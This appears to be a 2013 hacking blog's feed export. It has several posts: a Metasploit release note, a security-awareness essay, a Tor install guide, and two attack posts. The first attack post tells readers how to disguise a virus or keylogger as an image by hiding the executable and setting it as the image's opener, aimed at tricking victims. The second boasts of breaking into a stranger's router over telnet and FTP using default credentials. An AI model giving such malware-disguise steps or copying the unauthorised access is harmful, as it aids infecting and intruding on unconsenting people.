Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-1947482460156738842013-05-07T01:14:00.002-07:002013-05-07T01:14:17.331-07:00Bind an .EXE File to Any File Bind an .EXE File to Any File without<br />software<br /><br />Many readers have been asking me how to hide their virus, keylogger, or any .exe file inside a .mp3, .png, etc. file. Here i am going to show you how to hide a virus within a normal media file. In this example we will be hiding a virus inside what appears to be a normal image file. It should work on .mp3, .wav, or any other file, probably even .iso's, never tried that though.<br />
<br />How to Bind an .EXE File to a .PNG File?<br /><br />1. First, you need to put your virus and a picture in a folder.<br />2. Right click on the server, click properties.<br />3. Click the 'Hidden' Option<br /><br />After that you don't have to worry about the .exe, unless you need to FUD it or something.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM9Q8tZ9HpI/AAAAAAAAE2g/1jnSvQZBRik/s400/27yajwo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM9Q8tZ9HpI/AAAAAAAAE2g/1jnSvQZBRik/s400/27yajwo.png" height="320" width="246" /></a></div>
4. Now, what you need to do is click properties on the image.<br />5. Click the change button for what it opens with and choose your server (you have to find it).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/_F7GuXCzPQdY/TM9RYI5agEI/AAAAAAAAE2o/bGHPwm2nRlg/s400/25zth6e.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_F7GuXCzPQdY/TM9RYI5agEI/AAAAAAAAE2o/bGHPwm2nRlg/s400/25zth6e.png" height="320" width="255" /></a></div>
6. Now thats all you really have to do, the rest of what you do is up to you.<br />7. But this isn't very effective, just simple and easy. The only way this will work is one of 2 things.<br /><br />The person is very stupid, and sees the .exe because his PC shows hidden files, or he/she have the option, 'do not shot hidden files' in control panel/folder options selected.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM9Swi4dyII/AAAAAAAAE2w/oAJfFGKSi9Q/s400/5555.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM9Swi4dyII/AAAAAAAAE2w/oAJfFGKSi9Q/s400/5555.png" height="320" width="261" /></a></div>
Now this is what the finished project should look like to normal users:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM9TErmK9SI/AAAAAAAAE24/zl-wgGwbn_Y/s400/2010-11-02_0053.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM9TErmK9SI/AAAAAAAAE24/zl-wgGwbn_Y/s400/2010-11-02_0053.png" height="111" width="320" /></a></div>
Now the user will open the picture, see it, and not care anymore. Also, it says the picture is 12 KB, but in reality, the hidden .exe adds to the folder size.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/_F7GuXCzPQdY/TM9TdJ1qrGI/AAAAAAAAE3A/pNcx2kmyaRM/s400/2cxj88i.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_F7GuXCzPQdY/TM9TdJ1qrGI/AAAAAAAAE3A/pNcx2kmyaRM/s400/2cxj88i.png" height="320" width="253" /></a></div>
<br />
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-37279423189452223022013-05-06T03:04:00.002-07:002013-05-06T03:04:51.825-07:00Metasploit Pro 4.5.0 <div style="text-align: left;">
Metasploit Pro 4.5.0 Release - Penetration Testing Software</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twimg0-a.akamaihd.net/profile_images/485580923/metasploit_logo_icbm2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://twimg0-a.akamaihd.net/profile_images/485580923/metasploit_logo_icbm2.jpg" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
Metasploit Pro 4.5.0 delivers completely new capabilities for running full-featured social engineering campaigns as well as significant improvements to the web application scanner. Metasploit Pro users can run sophisticated social engineering campaigns leveraging techniques like phishing and USB drops, watch results in real-time, and present reports containing clear risk analysis and remediation advice for the human attack surface. <br /><br />Metasploit 4.5.0 includes 95 new exploits, 72 new auxiliary modules, and 13 new post modules over the 4.4.0 release, for a grand total of 180 new modules, all of which are detailed below. In addition, 56 reported bugs were resolved between 4.4.0 and 4.5.0. <br /><br />Modules that are new since the 2012112801 update (the last update in the 4.4.0 line) includes modules targeting the Tectia SSH server, Metasploit, Nessus, Eaton NSM, Nexpose, Microsoft Windows, SIP, Adobe Indesign, Apple Quicktime, BlazeVideo, and Ektron. They are listed immediately below. <br /><br />The update for 4.4.0 to 4.5.0 will be published shortly after the release of the 4.5.0 installer, and these release notes will be updated to reflect that update's availability.<a href="https://community.rapid7.com/docs/DOC-2108">Dowload Here</a></div>
<div style="text-align: left;">
<br /></div>
Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1tag:blogger.com,1999:blog-4425503975062865017.post-4858034241782367042013-05-06T02:59:00.001-07:002013-05-06T02:59:28.373-07:00Security Awareness Training: Why Every Business Needs It<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOIfQ5zIsq9WewcXRH7hbnyN7UTgVgl-eGb69Bbtps-Zu9gSXHg3o9XFYODVpHBKZitcljk8wsfdQWUZSdHMxtHP-2jtje7JQ6Lz0xpaj4Z2F_CycaY3LDb3Wr-qZWJCzwX7_LhlaMMT0/s200/Security+Awareness+Training.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOIfQ5zIsq9WewcXRH7hbnyN7UTgVgl-eGb69Bbtps-Zu9gSXHg3o9XFYODVpHBKZitcljk8wsfdQWUZSdHMxtHP-2jtje7JQ6Lz0xpaj4Z2F_CycaY3LDb3Wr-qZWJCzwX7_LhlaMMT0/s200/Security+Awareness+Training.png" /></a></div>
The need for security awareness training is more important than ever. Every company that plans to stay competitive must make this type of training mandatory for every employee. The reason for a stringent and complete training program and the need for every employee to be aware of security is the surprising direction from which security threats may come. The security threat that companies face comes as much from within as it does from outside corporate spying.<br /><br />Definition of the Direction of Threats<br />The threat from outside is usually better understood by company management than the threat from within. The internal threat is not just from unhappy employees. The employee who is unaware and untrained is the biggest threat. Employees who have not undergone security awareness training hurt the company by visiting Internet sites that have active malware. They often respond to emails that are phishing attacks and often keep their login and password information stored in an unprotected manner. Some uninformed employees may never think of the damage they do when discussing company projects in social gatherings, both on company time and outside the confines of the company facilities.<br />Why the Level of Training Intensity Must Be High<br />The only way to ensure that employees are not damaging the company, inadvertently or knowingly, is to set up company mandatory security training awareness programs. Every existing employee must be required to take this training when the program is started. New employees should be required to undergo security awareness training before starting their new job. This training should also require successful completion of a test to ensure a working knowledge of this vital topic has been received and understood. Update training should be required on a recurring basis as well.<br /><br />Training should be much more than an hour or two of classroom training. The company needs its own website that is dedicated to the security awareness of the company. Each employee should receive random hints and reminders by email, and posters on security should be posted in prominent places throughout the company facilities.<br />In this manner every company can have an increased level of confidence that each employee is knowledgeable of company policies, procedures on the matter of security for any information relating to the personnel, and products or projects of the company. This type of security awareness training is the only way that employees will know, understand and put to use best practices expected by company management.<br />Getting Started with Security Awareness Training<br />At the beginning, if the company does not have personnel trained in the curriculum for this training, it may be desirable for select employees to attend outside training in order to learn what is needed. By having the company's own personnel return to oversee this type of training sets the tone about the seriousness of this type of training.<br /><br />Peter Wendt is a writer from Austin, TX, that has researched a lot on the topic of malware and computer security, and highly recommends this security awareness training program for businesses and employees.<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-80027422311454874682013-05-06T02:54:00.001-07:002013-05-06T02:54:50.274-07:00Tutorial to Install TOR ON WINDOWS 7 INSTALL TOR on WINDOWS 7<br /><br />The Vidalia Bundle for Windows contains Tor, Vidalia (a GUI for Tor), Torbutton (a plugin for Mozilla Firefox), and Polipo (a web proxy) packaged into one bundle, with the four applications pre-configured to work together. Download either the stable or the experimental version of the Vidalia Bundle.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.torproject.org/images/screenshot-win32-installer-splash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://www.torproject.org/images/screenshot-win32-installer-splash.png" width="320" /></a></div>
If you have previously installed Tor, Vidalia, or Polipo you can deselect whichever components you do not need to install in the dialog shown below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.torproject.org/images/screenshot-win32-installer-components.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="https://www.torproject.org/images/screenshot-win32-installer-components.png" width="320" /></a></div>
After you have completed the installer, the components you selected will automatically be started for you.<br />Tor comes configured as a client by default. It uses a built-in default configuration file, and most people won't need to change any of the settings. Tor is now installed.<br />After installing Tor and Polipo, you need to configure your applications to use them. The first step is to set up web browsing.<br />You should use Tor with Firefox and Torbutton, for best safety. The bundle installs the Torbutton plugin for you. Restart your Firefox, and you're all set:<br />
<br />
If you plan to run Firefox on a different computer than Tor, see the <a href="https://trac.torproject.org/projects/tor/wiki/doc/TorFAQ#SocksListenAddress">FAQ entry for running Tor on a different computer</a>. <br />
<br />
To Torify other applications that support HTTP proxies, just point them at Polipo (that is, localhost port 8118). To use SOCKS directly (for instant messaging, Jabber, IRC, etc), you can point your application directly at Tor (localhost port 9050), but see this FAQ entry for why this may be dangerous. For applications that support neither SOCKS nor HTTP, take a look at SocksCap or FreeCap. (FreeCap is free software; SocksCap is proprietary.)<br />Check to see that Vidalia is running. Vidalia uses a small green onion to indicate Tor is running or a dark onion with a red "X" when Tor is not running. You can start or stop Tor by right-clicking on Vidalia's icon in your system tray and selecting "Start" or "Stop" from the menu as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.torproject.org/images/screenshot-win32-vidalia.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://www.torproject.org/images/screenshot-win32-vidalia.png" /></a></div>
Next, you should try using your browser with Tor and make sure that your IP address is being anonymized. Click on the Tor detector and see whether it thinks you're using Tor or not. <br />If you have a personal firewall that limits your computer's ability to connect to itself, be sure to allow connections from your local applications to local port 8118 and port 9050. If your firewall blocks outgoing connections, punch a hole so it can connect to at least TCP ports 80 and 443.<a href="https://www.torproject.org/download/download">Download Here</a><br /><br />
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com0tag:blogger.com,1999:blog-4425503975062865017.post-79659695826286147622013-05-06T02:48:00.000-07:002013-05-06T02:48:14.327-07:00How I Hacked A Remote Computer By Just IP Address Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address. Although we have discussed so many methods before and I always insist to learn some basic commands, protocols and their usage. This is my story like I have hacked into a remote by just using IP address (I have not downloaded any file even I have not cleared the logs). This story was not planned it just happened and I am sure you will like it and you will learn a lot of things if you don't know the basic commands and protocols.<br /><br />It was Saturday night and I was working hard on social engineering toolkit remote attack (WAN,Internet attack) that is why I was playing with my router for port forwarding and other stuffs, remember my ISP using a dynamic mechanism so I have created DNS server to get the static IP. It was almost night and I have decided to get some sleep and than I have saved my browser tabs so that next time I will use them.<br /><br />Its Sunday evening I have opened my browser and the previous tabs open automatically and then I got pop up window it asked about the user-name and password of my router I have looked to the address bar the IP address was same as it was saved by me, I was shocked that my ISP has not changed my WAN IP (remember ISP using dynamic IP), after this I have open a website about whatismyip and I have seen that my IP is different it means the window that ask about user name and password is the IP of another computer.<br /><br />Just got an idea why not to brute force it and get the access on the victim router, hydra has been discussed before, but before brute force I have decided to use guessing technique and I than I have entered so many combination but failed than I just used the default user name and password huurraaah I was in.<br /><br />Security was very low, than I did a quick nmap scan to get the open ports (remember I have turned off the firewall of victim router). According to the nmap result ftp and telnet was open and then I realized how vulnerable this victim is.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqa6QHOGdSOuXH8SkXer_0a_UfQG4ZDjIlo7baDGQMm1wKoh5WcX9Gi3hAKSxj3IRQ31p8AiiM35qlZdNjz0Yhr-pKxynLzdc0xD6jc5JCdeLUM0hlEoebgVmQ0NrrIi0R37XUDrldik/s400/nmap.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqa6QHOGdSOuXH8SkXer_0a_UfQG4ZDjIlo7baDGQMm1wKoh5WcX9Gi3hAKSxj3IRQ31p8AiiM35qlZdNjz0Yhr-pKxynLzdc0xD6jc5JCdeLUM0hlEoebgVmQ0NrrIi0R37XUDrldik/s320/nmap.jpg" width="320" /></a></div>
I came across to my terminal and open telnet to the victim by using the default password and I was in and now I was able to take control of this computer but this was not include in the plan.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMM0vpLWkGoBIUSiZ3MjRVqOUvjEbhFTuvf2wiC2nyOA9TExr19vPziHEhCNDA5x-IsXhAU1luiHKoOILtdagTxPloyQH71OdwQqa-sS6WaXlljBf7lTckVJJE5dD-Rbjwfxgx_qFrKE/s400/telnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaMM0vpLWkGoBIUSiZ3MjRVqOUvjEbhFTuvf2wiC2nyOA9TExr19vPziHEhCNDA5x-IsXhAU1luiHKoOILtdagTxPloyQH71OdwQqa-sS6WaXlljBf7lTckVJJE5dD-Rbjwfxgx_qFrKE/s320/telnet.jpg" width="320" /></a></div>
FTP (file transfer protocol), I came to my terminal again and this time I have used FTP command with the same combination of user name and password and successful. Remember FTP access means you can download and upload files on remote computer means full access. You can use some GUI ftp client but I used command.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXFLEGwnUXFNdxPhLjT6IE4qkeFiuvZ9TICF5xLXUh9y-9V3xhTN0QNYIpGRWcyfFKofjs5NtBsQeGrx5utI4uP8DuMiKhUnKvSs95j2r5eC2xvZvBjri_dqX8ySxa_QrKgU74bFBFCA0/s320/ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXFLEGwnUXFNdxPhLjT6IE4qkeFiuvZ9TICF5xLXUh9y-9V3xhTN0QNYIpGRWcyfFKofjs5NtBsQeGrx5utI4uP8DuMiKhUnKvSs95j2r5eC2xvZvBjri_dqX8ySxa_QrKgU74bFBFCA0/s320/ftp.jpg" /></a></div>
<div style="text-align: left;">
Countermeasure</div>
<div style="text-align: left;">
Always use a strong password<br />Turn on your Firewall (both on router and computer) </div>
<div style="text-align: center;">
<br /></div>
<br />Anonymoushttp://www.blogger.com/profile/07205144792292619986noreply@blogger.com1